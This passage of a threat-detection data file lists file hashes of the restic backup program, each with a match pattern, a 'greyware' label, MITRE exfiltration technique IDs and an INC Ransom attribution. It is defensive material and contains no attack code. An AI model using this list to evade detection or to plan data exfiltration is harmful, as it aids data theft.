"*489b3873fd79e99feae45e5953ccca3fd21a84eb68a99654ca0a6ac1b2dcd255*",".{0,1000}489b3873fd79e99feae45e5953ccca3fd21a84eb68a99654ca0a6ac1b2dcd255.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*492387572bb2c4de904fa400636e05492e7200b331335743d46f2f2874150162*",".{0,1000}492387572bb2c4de904fa400636e05492e7200b331335743d46f2f2874150162.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*49a093e97e5091456452d7e8edc9450cb0028ba777b62711b209b9db12317cdd*",".{0,1000}49a093e97e5091456452d7e8edc9450cb0028ba777b62711b209b9db12317cdd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*49b63459ce22867bee13f2589aba38a51ed5bc728fd6f38f9ab107c7a4f00471*",".{0,1000}49b63459ce22867bee13f2589aba38a51ed5bc728fd6f38f9ab107c7a4f00471.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4acda13c308d3fd2b892ddf6fe210b8438c7a97abe88797315d06600fcfcbcc6*",".{0,1000}4acda13c308d3fd2b892ddf6fe210b8438c7a97abe88797315d06600fcfcbcc6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4ad8bca8939396f8a99252e096891b064472e3abd9b8fdd1b7c2e4c80cc74348*",".{0,1000}4ad8bca8939396f8a99252e096891b064472e3abd9b8fdd1b7c2e4c80cc74348.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4af2dc16619d3a9da05be6220a9b160433d5b0fc37bd6b679afbdd6e73a79a4f*",".{0,1000}4af2dc16619d3a9da05be6220a9b160433d5b0fc37bd6b679afbdd6e73a79a4f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4b2335364a62f3268581e6343b3b9243fa89ef6a48ca9b24ea2db1a949e91156*",".{0,1000}4b2335364a62f3268581e6343b3b9243fa89ef6a48ca9b24ea2db1a949e91156.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4b7c2e0e6e2491b55ca2bfc8d7198fa7e750afb8a5e779fa50623fa718fd7827*",".{0,1000}4b7c2e0e6e2491b55ca2bfc8d7198fa7e750afb8a5e779fa50623fa718fd7827.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4bcce7c204dc4ce408bfb2a127ff17294b845d435d6f5f3cb3ab6064d9d3188d*",".{0,1000}4bcce7c204dc4ce408bfb2a127ff17294b845d435d6f5f3cb3ab6064d9d3188d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4c908414d885dbe8b105b4c794931bcaf649a8184e1addda4785cef8307bc3e7*",".{0,1000}4c908414d885dbe8b105b4c794931bcaf649a8184e1addda4785cef8307bc3e7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4d9ec99ceec71df88f47c5ebae5fdd15474f7d36e9685a655830c2fc89ad9153*",".{0,1000}4d9ec99ceec71df88f47c5ebae5fdd15474f7d36e9685a655830c2fc89ad9153.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4e55db9ef3e258914860532610cc37db12e2f875f9bd8fd5b789c4a55f7b4f6c*",".{0,1000}4e55db9ef3e258914860532610cc37db12e2f875f9bd8fd5b789c4a55f7b4f6c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4e9929b68f2e9f3df50e4b320ee85357134efde38986d25983b8fcf50e19cd22*",".{0,1000}4e9929b68f2e9f3df50e4b320ee85357134efde38986d25983b8fcf50e19cd22.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*4eb7ebda84217bc575fff510a5534f5750772915d6efa435a9ce49ef5eb0b075*",".{0,1000}4eb7ebda84217bc575fff510a5534f5750772915d6efa435a9ce49ef5eb0b075.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4ef3458f9635baf5cfd25a793486b612df7f4904c91eb2e4558d9713fcd34912*",".{0,1000}4ef3458f9635baf5cfd25a793486b612df7f4904c91eb2e4558d9713fcd34912.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4f3e5adb0523a6811d21570838c9f061b7c9bb01264be518d0ed55039ac42547*",".{0,1000}4f3e5adb0523a6811d21570838c9f061b7c9bb01264be518d0ed55039ac42547.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4f8be171615906969f1393b450924f0afe3458ff88f7fb8be89f5c02837b4026*",".{0,1000}4f8be171615906969f1393b450924f0afe3458ff88f7fb8be89f5c02837b4026.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*50362f6c4c2d91cf0edc750c578b73605fdbb79443874110cc0a64913553f76b*",".{0,1000}50362f6c4c2d91cf0edc750c578b73605fdbb79443874110cc0a64913553f76b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*50a8e58ad1cda3eaabbd812d064b7cb40e7119b6c4838ef5c1c74b8f6db8a5cc*",".{0,1000}50a8e58ad1cda3eaabbd812d064b7cb40e7119b6c4838ef5c1c74b8f6db8a5cc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5129b1b4b402350d6a7ff85b511dc2c8c94148e8fdb25d57c368d47cbe5d6703*",".{0,1000}5129b1b4b402350d6a7ff85b511dc2c8c94148e8fdb25d57c368d47cbe5d6703.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*514d0711317427f45d3ca23e66cf66e9f98caef660314d843f59b38511e94a2c*",".{0,1000}514d0711317427f45d3ca23e66cf66e9f98caef660314d843f59b38511e94a2c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*527ddd722d4629f835321d6b8cb25f28d4b55fb7b7e946e95c1e2098b88f86ef*",".{0,1000}527ddd722d4629f835321d6b8cb25f28d4b55fb7b7e946e95c1e2098b88f86ef.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*52aca841486eaf4fe6422b059aa05bbf20db94b957de1d3fca019ed2af8192b7*",".{0,1000}52aca841486eaf4fe6422b059aa05bbf20db94b957de1d3fca019ed2af8192b7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*53774723cd9aa6a4a815ad002dd8be8535611237463240767ef3821f0d9e14b4*",".{0,1000}53774723cd9aa6a4a815ad002dd8be8535611237463240767ef3821f0d9e14b4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*53b7392e1f6973680579aa054458531886ef6d359868bcb2a4a52f7ffa5cf8f3*",".{0,1000}53b7392e1f6973680579aa054458531886ef6d359868bcb2a4a52f7ffa5cf8f3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*53ce7b5352a21cee0659ff9fbe71cd553cce35e1f72cb5db10975263fccebd47*",".{0,1000}53ce7b5352a21cee0659ff9fbe71cd553cce35e1f72cb5db10975263fccebd47.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*53d0b11932ca6402d75e8ace78625dac6599573d8e783001faf161dc8bccf063*",".{0,1000}53d0b11932ca6402d75e8ace78625dac6599573d8e783001faf161dc8bccf063.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*53f3f97e369c874277a38fec36f2d533a865ad22c4ff8f06e4335f682c36b65a*",".{0,1000}53f3f97e369c874277a38fec36f2d533a865ad22c4ff8f06e4335f682c36b65a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*542fd8635fa9784837b4adc0baf96ec514ed347c30603db9bc953ecce68399e4*",".{0,1000}542fd8635fa9784837b4adc0baf96ec514ed347c30603db9bc953ecce68399e4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*57384f36febc695b32b0fd2910643ddaad6770898cf63a9f97a2f76e9faed5a8*",".{0,1000}57384f36febc695b32b0fd2910643ddaad6770898cf63a9f97a2f76e9faed5a8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*574aeb6cb673aa96cab6fa82656126f1ece4079edf89f68de09a3fce708ad47e*",".{0,1000}574aeb6cb673aa96cab6fa82656126f1ece4079edf89f68de09a3fce708ad47e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*57556703267587c0017816c99be4a8a9b7ddead80a45dfce31b2fdab2a0304a5*",".{0,1000}57556703267587c0017816c99be4a8a9b7ddead80a45dfce31b2fdab2a0304a5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*575a6a7a4c23274aefb4eff8c0614036cc1999f108142741ce5296e4ce00811b*",".{0,1000}575a6a7a4c23274aefb4eff8c0614036cc1999f108142741ce5296e4ce00811b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5785f21245163c072e0f3acc39f86e5d105bf54c0245bbfcba5d2d21d1d6f301*",".{0,1000}5785f21245163c072e0f3acc39f86e5d105bf54c0245bbfcba5d2d21d1d6f301.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*57b5c5dbb54b9438aec465b9112ff4936876172c09f35746ddaa8792b52eb347*",".{0,1000}57b5c5dbb54b9438aec465b9112ff4936876172c09f35746ddaa8792b52eb347.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*58170b311be68a8149d51edce1c837bc1feb49b0f6b95b64a0bf76c2a7820a52*",".{0,1000}58170b311be68a8149d51edce1c837bc1feb49b0f6b95b64a0bf76c2a7820a52.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*581f25669bf62fbf90100987fc62d36c31e6781f1dd89e155e45e79c17fda0bf*",".{0,1000}581f25669bf62fbf90100987fc62d36c31e6781f1dd89e155e45e79c17fda0bf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5828751f5c11d3f77fbae66a616adf3a46fe1e09c130d282830597718769b869*",".{0,1000}5828751f5c11d3f77fbae66a616adf3a46fe1e09c130d282830597718769b869.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*58a1d3e8d51cc32760153418672a3a0a7d81b2996895fa533614842ca0a75c98*",".{0,1000}58a1d3e8d51cc32760153418672a3a0a7d81b2996895fa533614842ca0a75c98.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*5ad984e4bc9cf2b67a414f99c48b2f5621b12efaa1c838e4a6a13a7333641dc7*",".{0,1000}5ad984e4bc9cf2b67a414f99c48b2f5621b12efaa1c838e4a6a13a7333641dc7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5b46612254dcaec09a6f7ddae70e116f77c0f87ac7988dc379b34d0fd4bbc4c4*",".{0,1000}5b46612254dcaec09a6f7ddae70e116f77c0f87ac7988dc379b34d0fd4bbc4c4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5b94b821a76615c0557b5c98c66253e72f86a1b1ed18c908cf370b603fa10c3f*",".{0,1000}5b94b821a76615c0557b5c98c66253e72f86a1b1ed18c908cf370b603fa10c3f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5be16e35f6b1f8339af50531e3c165d3287f2bba9d1ad27a9c4e601364a0eb5c*",".{0,1000}5be16e35f6b1f8339af50531e3c165d3287f2bba9d1ad27a9c4e601364a0eb5c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5bf8796898cefcaced122d5188653d74ccf4412a3686f84cbcc312ebc1bd74ea*",".{0,1000}5bf8796898cefcaced122d5188653d74ccf4412a3686f84cbcc312ebc1bd74ea.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5bfc3639ab04d2456ed2e69be163a1b0734f14518b46ab711bac4c23e74585b0*",".{0,1000}5bfc3639ab04d2456ed2e69be163a1b0734f14518b46ab711bac4c23e74585b0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5c0f7d058401e664d0c6f244a0c928a8cc4dcf4db038896118f7b94e35cc6c46*",".{0,1000}5c0f7d058401e664d0c6f244a0c928a8cc4dcf4db038896118f7b94e35cc6c46.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5d86a4eb9a7178bb95ce83bf687929a433c9a4aaa2ba92b6330b393709acf745*",".{0,1000}5d86a4eb9a7178bb95ce83bf687929a433c9a4aaa2ba92b6330b393709acf745.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5dc863dba915a904465b9da951175ecc957fe3e016d1a026b3688a5c1cfadd80*",".{0,1000}5dc863dba915a904465b9da951175ecc957fe3e016d1a026b3688a5c1cfadd80.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5dd33ccba1c352f77d7578c5360c6f913092ea2f43ecbf919baf95b563902e2d*",".{0,1000}5dd33ccba1c352f77d7578c5360c6f913092ea2f43ecbf919baf95b563902e2d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5e4ebdeae037d0b3320d9793e91c6fe838a8436047ba030d54a13937a0c195a6*",".{0,1000}5e4ebdeae037d0b3320d9793e91c6fe838a8436047ba030d54a13937a0c195a6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5e7f65847b489875621d1732cfe4e2c46b7ddf3b0ced8e4d5b4e56a4a4a3f2f8*",".{0,1000}5e7f65847b489875621d1732cfe4e2c46b7ddf3b0ced8e4d5b4e56a4a4a3f2f8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*5ff6757d8544719b70bfa25c08f13781421e260b60c9351c88a4898be159dff8*",".{0,1000}5ff6757d8544719b70bfa25c08f13781421e260b60c9351c88a4898be159dff8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*60376b01b334a0cee3a59016f44dde8b336de2b6aa44f1e6e403d307990c47a0*",".{0,1000}60376b01b334a0cee3a59016f44dde8b336de2b6aa44f1e6e403d307990c47a0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*608b6b396eed970d75d8030e8f54c5aa06ba7b2b368ddcd80f114da24a62f6de*",".{0,1000}608b6b396eed970d75d8030e8f54c5aa06ba7b2b368ddcd80f114da24a62f6de.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*612691d7e5100f1714fd4ce7c2ecee2c5b0447d68b480278d54ec58f6c7e2e29*",".{0,1000}612691d7e5100f1714fd4ce7c2ecee2c5b0447d68b480278d54ec58f6c7e2e29.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*613428c4c54093ada2ee1b5c9fe1cccf8bf781bc07fc64071d0e21e55f99a0c1*",".{0,1000}613428c4c54093ada2ee1b5c9fe1cccf8bf781bc07fc64071d0e21e55f99a0c1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*62655adaad7e6118fde3fff73cfc07f73ecd898900b9518c3b7aec5b2ac7623e*",".{0,1000}62655adaad7e6118fde3fff73cfc07f73ecd898900b9518c3b7aec5b2ac7623e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*626ca456089857683c1ab8a5e3eda282837f7ed466ecf1a3c2cdd30e1b309c35*",".{0,1000}626ca456089857683c1ab8a5e3eda282837f7ed466ecf1a3c2cdd30e1b309c35.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*63d13d53834ea8aa4d461f0bfe32a89c70ec47e239b91f029ed10bd88b8f4b80*",".{0,1000}63d13d53834ea8aa4d461f0bfe32a89c70ec47e239b91f029ed10bd88b8f4b80.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*63f982006a02f5dd1b521e16cf203e42bf9a479deab3e89fa88b99e49cb03364*",".{0,1000}63f982006a02f5dd1b521e16cf203e42bf9a479deab3e89fa88b99e49cb03364.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6410bf4446b371c8cc9dab16e0cdc1d0e5f21cfd3750a3a20f4c07c36befd5bc*",".{0,1000}6410bf4446b371c8cc9dab16e0cdc1d0e5f21cfd3750a3a20f4c07c36befd5bc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*66ee25c76d430eea6f787983fe0e79368304ddc69494a4876b012bc3932b1db3*",".{0,1000}66ee25c76d430eea6f787983fe0e79368304ddc69494a4876b012bc3932b1db3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*67003a49d703431238d30117af78874ef72453ba883cc8d2f03e1a4227da54f9*",".{0,1000}67003a49d703431238d30117af78874ef72453ba883cc8d2f03e1a4227da54f9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 